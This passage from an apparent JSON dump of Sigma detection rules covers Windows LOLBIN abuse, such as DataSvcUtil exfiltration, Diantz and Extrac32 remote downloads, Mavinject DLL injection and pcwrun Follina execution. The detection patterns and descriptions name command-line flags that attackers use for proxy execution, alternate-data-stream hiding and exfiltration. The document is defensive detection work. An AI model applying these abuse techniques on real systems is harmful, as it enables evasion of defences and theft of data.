    "content": "title: LOLBAS Data Exfiltration by DataSvcUtil.exe\nid: e290b10b-1023-4452-a4a9-eb31a9013b3a\nstatus: test\ndescription: Detects when a user performs data exfiltration by using DataSvcUtil.exe\nreferences:\n    - https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6\n    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe\n    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services\n    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services\n    - https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/\nauthor: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger\ndate: 2021-09-30\nmodified: 2022-05-16\ntags:\n    - attack.exfiltration\n    - attack.t1567\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli:\n        CommandLine|contains:\n            - '/in:'\n            - '/out:'\n            - '/uri:'\n    selection_img:\n        - Image|endswith: '\\DataSvcUtil.exe'\n        - OriginalFileName: 'DataSvcUtil.exe'\n    condition: all of selection*\nfalsepositives:\n    - DataSvcUtil.exe being used may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml",
    "content": "title: Devtoolslauncher.exe Executes Specified Binary\nid: cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6\nstatus: test\ndescription: The Devtoolslauncher.exe executes other binary\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/\n    - https://twitter.com/_felamos/status/1179811992841797632\nauthor: Beyu Denis, oscd.community (rule), @_felamos (idea)\ndate: 2019-10-12\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\devtoolslauncher.exe'\n        CommandLine|contains: 'LaunchForDeploy'\n    condition: selection\nfalsepositives:\n    - Legitimate use of devtoolslauncher.exe by legitimate user\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml",
    "content": "title: Suspicious Diantz Alternate Data Stream Execution\nid: 6b369ced-4b1d-48f1-b427-fdc0de0790bd\nstatus: test\ndescription: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Diantz/\nauthor: frack113\ndate: 2021-11-26\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - diantz.exe\n            - .cab\n        CommandLine|re: ':[^\\\\]'\n    condition: selection\nfalsepositives:\n    - Very Possible\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml",
    "content": "title: Suspicious Diantz Download and Compress Into a CAB File\nid: 185d7418-f250-42d0-b72e-0c8b70661e93\nstatus: test\ndescription: Download and compress a remote file and store it in a cab file on local machine.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Diantz/\nauthor: frack113\ndate: 2021-11-26\nmodified: 2022-08-13\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - diantz.exe\n            - ' \\\\\\\\'\n            - '.cab'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml",
    "content": "title: Suspicious Extrac32 Execution\nid: aa8e035d-7be4-48d3-a944-102aec04400d\nstatus: test\ndescription: Download or Copy file with Extrac32\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/\nauthor: frack113\ndate: 2021-11-26\nmodified: 2022-08-13\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_lolbas:\n        - CommandLine|contains: extrac32.exe\n        - Image|endswith: '\\extrac32.exe'\n        - OriginalFileName: 'extrac32.exe'\n    selection_archive:\n        CommandLine|contains: '.cab'\n    selection_options:\n        CommandLine|contains:\n            - /C\n            - /Y\n            - ' \\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml",
    "content": "title: Suspicious Extrac32 Alternate Data Stream Execution\nid: 4b13db67-0c45-40f1-aba8-66a1a7198a1e\nstatus: test\ndescription: Extract data from cab file and hide it in an alternate data stream\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/\nauthor: frack113\ndate: 2021-11-26\nmodified: 2022-12-30\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - extrac32.exe\n            - .cab\n        CommandLine|re: ':[^\\\\]'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_gather_network_info.yml",
    "content": "title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS\nid: 575dce0c-8139-4e30-9295-1ee75969f7fe\nrelated:\n    - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate\n      type: similar\n    - id: 07aa184a-870d-413d-893a-157f317f6f58 # ProcCreation Susp\n      type: similar\nstatus: test\ndescription: Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine\nreferences:\n    - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs\n    - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\nauthor: blueteamer8699\ndate: 2022-01-03\nmodified: 2023-02-08\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1615\n    - attack.t1059.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cscript.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'cscript.exe'\n              - 'wscript.exe'\n    selection_cli:\n        CommandLine|contains: 'gatherNetworkInfo.vbs'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml",
    "content": "title: Gpscript Execution\nid: 1e59c230-6670-45bf-83b0-98903780607e\nstatus: test\ndescription: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy\nreferences:\n    - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/\n    - https://lolbas-project.github.io/lolbas/Binaries/Gpscript/\nauthor: frack113\ndate: 2022-05-16\nmodified: 2023-06-14\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\gpscript.exe'\n        - OriginalFileName: 'GPSCRIPT.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - ' /logon'\n            - ' /startup'\n    filter_main_svchost:\n        ParentCommandLine: 'C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate uses of logon scripts distributed via group policy\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml",
    "content": "title: Ie4uinit Lolbin Use From Invalid Path\nid: d3bf399f-b0cf-4250-8bb4-dfc192ab81dc\nstatus: test\ndescription: Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/\n    - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\nauthor: frack113\ndate: 2022-05-07\nmodified: 2022-05-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    lolbin:\n        - Image|endswith: '\\ie4uinit.exe'\n        - OriginalFileName: 'IE4UINIT.EXE'\n    filter_correct:\n        CurrentDirectory:\n            - 'c:\\windows\\system32\\'\n            - 'c:\\windows\\sysWOW64\\'\n    filter_missing:\n        CurrentDirectory: null\n    condition: lolbin and not 1 of filter_*\nfalsepositives:\n    - ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml",
    "content": "title: Launch-VsDevShell.PS1 Proxy Execution\nid: 45d3a03d-f441-458c-8883-df101a3bb146\nstatus: test\ndescription: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.\nreferences:\n    - https://twitter.com/nas_bench/status/1535981653239255040\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.t1216.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_script:\n        CommandLine|contains: 'Launch-VsDevShell.ps1'\n    selection_flags:\n        CommandLine|contains:\n            - 'VsWherePath '\n            - 'VsInstallationPath '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the script by a developer\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml",
    "content": "title: Potential Manage-bde.wsf Abuse To Proxy Execution\nid: c363385c-f75d-4753-a108-c1a8e28bdbda\nstatus: test\ndescription: Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/\n    - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712\n    - https://twitter.com/bohops/status/980659399495741441\n    - https://twitter.com/JohnLaTwC/status/1223292479270600706\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md\nauthor: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-13\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wscript_img:\n        - Image|endswith: '\\wscript.exe'\n        - OriginalFileName: 'wscript.exe'\n    selection_wscript_cli:\n        CommandLine|contains: 'manage-bde.wsf'\n    selection_parent:\n        ParentImage|endswith:\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n        ParentCommandLine|contains: 'manage-bde.wsf'\n    selection_filter_cmd:\n        Image|endswith: '\\cmd.exe'\n    condition: all of selection_wscript_* or (selection_parent and not selection_filter_cmd)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml",
    "content": "title: Mavinject Inject DLL Into Running Process\nid: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66\nrelated:\n    - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8\n      type: obsolete\nstatus: test\ndescription: Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md\n    - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e\n    - https://twitter.com/gN3mes1s/status/941315826107510784\n    - https://reaqta.com/2017/12/mavinject-microsoft-injector/\n    - https://twitter.com/Hexacorn/status/776122138063409152  # Deleted tweet\n    - https://github.com/SigmaHQ/sigma/issues/3742\n    - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection\nauthor: frack113, Florian Roth\ndate: 2021-07-12\nmodified: 2022-12-05\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.001\n    - attack.t1218.013\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ' /INJECTRUNNING '\n    filter:\n        ParentImage: 'C:\\Windows\\System32\\AppVClient.exe' # This parent is the expected process to launch \"mavinject\"\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_mpiexec.yml",
    "content": "title: MpiExec Lolbin\nid: 729ce0ea-5d8f-4769-9762-e35de441586d\nstatus: test\ndescription: Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary\nreferences:\n    - https://twitter.com/mrd0x/status/1465058133303246867\n    - https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-11\nmodified: 2024-11-23\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_binary:\n        - Image|endswith: '\\mpiexec.exe'\n        - Hashes|contains: 'IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217'\n    selection_flags:\n        CommandLine|contains:\n            - ' /n 1 '\n            - ' -n 1 '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml",
    "content": "title: Execute Files with Msdeploy.exe\nid: 646bc99f-6682-4b47-a73a-17b1b64c9d34\nstatus: test\ndescription: Detects file execution using the msdeploy.exe lolbin\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/\n    - https://twitter.com/pabraeken/status/995837734379032576\n    - https://twitter.com/pabraeken/status/999090532839313408\nauthor: Beyu Denis, oscd.community\ndate: 2020-10-18\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'verb:sync'\n            - '-source:RunCommand'\n            - '-dest:runCommand'\n        Image|endswith: '\\msdeploy.exe'\n    condition: selection\nfalsepositives:\n    - System administrator Usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml",
    "content": "title: Use of OpenConsole\nid: 814c95cc-8192-4378-a70a-f1aafd877af1\nstatus: test\ndescription: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting\nreferences:\n    - https://twitter.com/nas_bench/status/1537563834478645252\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-16\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'OpenConsole.exe'\n        - Image|endswith: '\\OpenConsole.exe'\n    filter:\n        Image|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal' # We exclude the default path for WindowsTerminal\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml",
    "content": "title: OpenWith.exe Executes Specified Binary\nid: cec8e918-30f7-4e2d-9bfa-a59cc97ae60f\nstatus: test\ndescription: The OpenWith.exe executes other binary\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml\n    - https://twitter.com/harr0ey/status/991670870384021504\nauthor: Beyu Denis, oscd.community (rule), @harr0ey (idea)\ndate: 2019-10-12\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\OpenWith.exe'\n        CommandLine|contains: '/c'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml",
    "content": "title: Use of Pcalua For Execution\nid: 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2\nrelated:\n    - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02\n      type: obsolete\nstatus: test\ndescription: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Pcalua/\n    - https://pentestlab.blog/2020/07/06/indirect-command-execution/\nauthor: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2022-06-14\nmodified: 2023-01-04\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\pcalua.exe'\n        CommandLine|contains: ' -a' # No space after the flag because it accepts anything as long as there a \"-a\"\n    condition: selection\nfalsepositives:\n    - Legitimate use by a via a batch script or by an administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml",
    "content": "title: Indirect Command Execution By Program Compatibility Wizard\nid: b97cd4b1-30b8-4a9d-bd72-6293928d52bc\nstatus: test\ndescription: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe\nreferences:\n    - https://twitter.com/pabraeken/status/991335019833708544\n    - https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/\nauthor: A. Sungurov , oscd.community\ndate: 2020-10-12\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\pcwrun.exe'\n    condition: selection\nfalsepositives:\n    - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts\n    - Legit usage of scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml",
    "content": "title: Execute Pcwrun.EXE To Leverage Follina\nid: 6004abd0-afa4-4557-ba90-49d172e0a299\nstatus: test\ndescription: Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability\nreferences:\n    - https://twitter.com/nas_bench/status/1535663791362519040\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\pcwrun.exe'\n        CommandLine|contains: '../'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml",
    "content": "title: Code Execution via Pcwutl.dll\nid: 9386d78a-7207-4048-9c9f-a93a7c2d1c05\nstatus: test\ndescription: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/\n    - https://twitter.com/harr0ey/status/989617817849876488\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-05\nmodified: 2023-02-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'pcwutl'\n            - 'LaunchApplication'\n    condition: all of selection_*\nfalsepositives:\n    - Use of Program Compatibility Troubleshooter Helper\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pester.yml",
    "content": "title: Execute Code with Pester.bat as Parent\nid: 18988e1b-9087-4f8a-82fe-0414dce49878\nrelated:\n    - id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e\n      type: similar\nstatus: test\ndescription: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)\nreferences:\n    - https://twitter.com/Oddvarmoe/status/993383596244258816\n    - https://twitter.com/_st0pp3r_/status/1560072680887525378\nauthor: frack113, Nasreddine Bencherchali\ndate: 2022-08-20\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_module:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        ParentCommandLine|contains: '\\WindowsPowerShell\\Modules\\Pester\\'\n    selection_cli:\n        ParentCommandLine|contains:\n            - '{ Invoke-Pester -EnableExit ;'\n            - '{ Get-Help \"'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of Pester for writing tests for Powershell scripts and modules\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml",
    "content": "title: Execute Code with Pester.bat\nid: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e\nstatus: test\ndescription: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)\nreferences:\n    - https://twitter.com/Oddvarmoe/status/993383596244258816\n    - https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-08\nmodified: 2023-11-09\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    powershell_module:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains|all:\n            - 'Pester'\n            - 'Get-Help'\n    cmd_execution:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - 'pester'\n            - ';'\n    get_help:\n        CommandLine|contains:\n            - 'help'\n            - '\\?'\n    condition: powershell_module or (cmd_execution and get_help)\nfalsepositives:\n    - Legitimate use of Pester for writing tests for Powershell scripts and modules\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml",
    "content": "title: PrintBrm ZIP Creation of Extraction\nid: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7\nstatus: test\ndescription: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/\nauthor: frack113\ndate: 2022-05-02\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\PrintBrm.exe'\n        CommandLine|contains|all:\n            - ' -f'\n            - '.zip'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml",
    "content": "title: Pubprn.vbs Proxy Execution\nid: 1fb76ab8-fa60-4b01-bddd-71e89bf555da\nstatus: test\ndescription: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/Pubprn/\nauthor: frack113\ndate: 2022-05-28\ntags:\n    - attack.defense-evasion\n    - attack.t1216.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\pubprn.vbs'\n            - 'script:'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml",
    "content": "title: DLL Execution via Rasautou.exe\nid: cd3d1298-eb3b-476c-ac67-12847de55813\nstatus: test\ndescription: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/\n    - https://github.com/fireeye/DueDLLigence\n    - https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\n    definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud)\ndetection:\n    selection_img:\n        - Image|endswith: '\\rasautou.exe'\n        - OriginalFileName: 'rasdlui.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -d '\n            - ' -p '\n    condition: all of selection*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml",
    "content": "title: REGISTER_APP.VBS Proxy Execution\nid: 1c8774a0-44d4-4db0-91f8-e792359c70bd\nstatus: test\ndescription: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.\nreferences:\n    - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\register_app.vbs'\n            - '-register'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_remote.yml",
    "content": "title: Use of Remote.exe\nid: 4eddc365-79b4-43ff-a9d7-99422dc34b93\nstatus: test\ndescription: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.\nreferences:\n    - https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2022-06-02\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\remote.exe'\n        - OriginalFileName: 'remote.exe'\n    condition: selection\nfalsepositives:\n    - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_replace.yml",
    "content": "title: Replace.exe Usage\nid: 9292293b-8496-4715-9db6-37028dcda4b3\nstatus: test\ndescription: Detects the use of Replace.exe which can be used to replace file with another file\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Replace/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace\nauthor: frack113\ndate: 2022-03-06\nmodified: 2024-03-13\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\replace.exe'\n    argument:\n        CommandLine|contains|windash: '-a'\n    condition: selection and argument\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml",
    "content": "title: Lolbin Runexehelper Use As Proxy\nid: cd71385d-fd9b-4691-9b98-2b1f7e508714\nstatus: test\ndescription: Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs\nreferences:\n    - https://twitter.com/0gtweet/status/1206692239839289344\n    - https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/\nauthor: frack113\ndate: 2022-12-29\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\runexehelper.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml",
    "content": "title: Suspicious Runscripthelper.exe\nid: eca49c87-8a75-4f13-9c73-a5a29e845f03\nstatus: test\ndescription: Detects execution of powershell scripts via Runscripthelper.exe\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2022-07-11\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\Runscripthelper.exe'\n        CommandLine|contains: 'surfacecheck'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml",
